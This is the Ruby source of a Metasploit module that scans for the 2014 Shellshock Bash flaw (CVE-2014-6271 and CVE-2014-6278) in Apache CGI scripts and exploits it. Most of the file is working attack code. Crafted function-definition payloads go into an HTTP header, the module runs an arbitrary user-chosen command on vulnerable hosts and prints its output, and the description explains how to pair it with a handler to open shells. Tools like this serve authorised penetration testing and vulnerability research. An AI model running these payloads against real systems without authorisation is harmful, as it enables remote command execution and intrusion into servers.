Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner',
      'Description' => %q{
        This module scans for the Shellshock vulnerability, a flaw in how the Bash shell
        handles external environment variables. This module targets CGI scripts in the
        Apache web server by setting the HTTP_USER_AGENT environment variable to a
        malicious function definition.

        PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your
        CMD, set ExitOnSession false, run -j, and then run this module to create
        sessions on vulnerable hosts.

        Note that this is not the recommended method for obtaining shells.
        If you require sessions, please use the apache_mod_cgi_bash_env_exec
        exploit module instead.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'wvu', # Metasploit module
        'lcamtuf' # CVE-2014-6278
      ],
      'References' => [
        [ 'CVE', '2014-6271' ],
        [ 'CVE', '2014-6278' ],
        [ 'OSVDB', '112004' ],
        [ 'EDB', '34765' ],
        [ 'URL', 'https://access.redhat.com/articles/1200223' ],
        [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ]
      ],
      'DisclosureDate' => '2014-09-24',
      'License' => MSF_LICENSE,
      'Notes' => {'AKA' => ['Shellshock']}
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
      OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
      OptString.new('CMD', [true, 'Command to run (absolute paths required)',
        '/usr/bin/id']),
      OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271',
        ['CVE-2014-6271', 'CVE-2014-6278']])
    ])
  end

  def check_host(ip)
    res = req("echo #{marker}", datastore['CVE'])

    if res && res.body.include?(marker * 3)
      report_vuln(
        :host => ip,
        :port => rport,
        :name => self.name,
        :refs => self.references
      )
      return Exploit::CheckCode::Vulnerable
    elsif res && res.code == 500
      injected_res_code = res.code
    else
      return Exploit::CheckCode::Safe
    end

    res = send_request_cgi({
      'method' => datastore['METHOD'],
      'uri' => normalize_uri(target_uri.path.to_s)
    })

    if res && injected_res_code == res.code
      return Exploit::CheckCode::Unknown
    elsif res && injected_res_code != res.code
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Unknown
  end

  def run_host(ip)
    return unless check_host(ip) == Exploit::CheckCode::Vulnerable

    res = req(datastore['CMD'], datastore['CVE'])

    if res && res.body =~ /#{marker}(.+)#{marker}/m
      print_good("#{$1}")
      report_vuln(
        :host => ip,
        :port => rport,
        :name => self.name,
        :refs => self.references
      )
    end
  end

  def req(cmd, cve)
    case cve
    when 'CVE-2014-6271'
      sploit = cve_2014_6271(cmd)
    when 'CVE-2014-6278'
      sploit = cve_2014_6278(cmd)
    end

    send_request_cgi(
      'method' => datastore['METHOD'],
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        datastore['HEADER'] => sploit
      }
    )
  end

  def cve_2014_6271(cmd)
    %Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
  end

  def cve_2014_6278(cmd)
    %Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
  end

  def marker
    @marker ||= Rex::Text.rand_text_alphanumeric(rand(42) + 1)
  end
end